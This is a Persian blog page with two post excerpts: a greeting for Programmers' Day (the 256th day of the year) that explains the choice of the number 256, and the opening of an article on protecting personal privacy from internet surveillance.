ادامه نوشته

روز برنامه نویسان مبارک

روز برنامه نویس مبارک....

روز ۲۵۶ام هر سال (معادل عدد ۱۰۰ در مبنای شانزده) مطابق با ۱۳ سپتامبر (۱۲ سپتامبر در سال‌های کبیسه) به عنوان روز برنامه‌نویسان نام گرفته‌است. روسیه اولین کشوری بود که این روز را به عنوان روز برنامه‌نویس به رسمیت شناخت و پس از آن کشورهای آلمان، کانادا، چین، کرواسی، فرانسه، گوآتمالا، هند، بلژیک، استرالیا، نیوزیلند، لهستان، اسلوونی، بریتانیا، و ایالات متحده آمریکا نیز این روز را به عنوان روز برنامه‌نویس به رسمیت شناختند.

از جمله دلایل انتخاب عدد ۲۵۶ به عنوان روز برنامه نویس می‌توان به موارد زیر اشاره کرد:

عدد ۲۵۶ بزرگترین توان عدد ۲ کوچکتر از ۳۶۵ که تعداد روزهای یک سال است، می‌باشد.
در سیستم دودویی کامپیوتری تعداد اعدادی که می‌توان در یک بایت جا داد ۲۵۶ تا می‌باشد.
عدد ۲۵۶ به صورت کلی برای برنامه‌نویس‌ها عددی آشناست.

محافظت از خود در برابر شنود اینترنتی

بعد از افشاء و انتشار خبر شنود و استراق سمع سازمان های امنیتی آمریکا از شهروندان خود، شاید شما هم نگران شده و به فکر افتاده باشید. بدون شک راه هایی برای محافظت از حریم خصوصی خود و مقابله با شنود اینترنتی وجود دارد. ولی باید دید که آیا این کارها ارزش وقت و محدودیت هایی را که ایجاد می کنند، دارند ؟

روش هایی که در اینجا پیشنهاد شده اند، همگی قابل انجام هستند ولی نیاز به صرف وقت و کمی پشتکار دارند تا واقعاً اجرایی شده و به طور مستمر ادامه پیدا کنند.

ادامه نوشته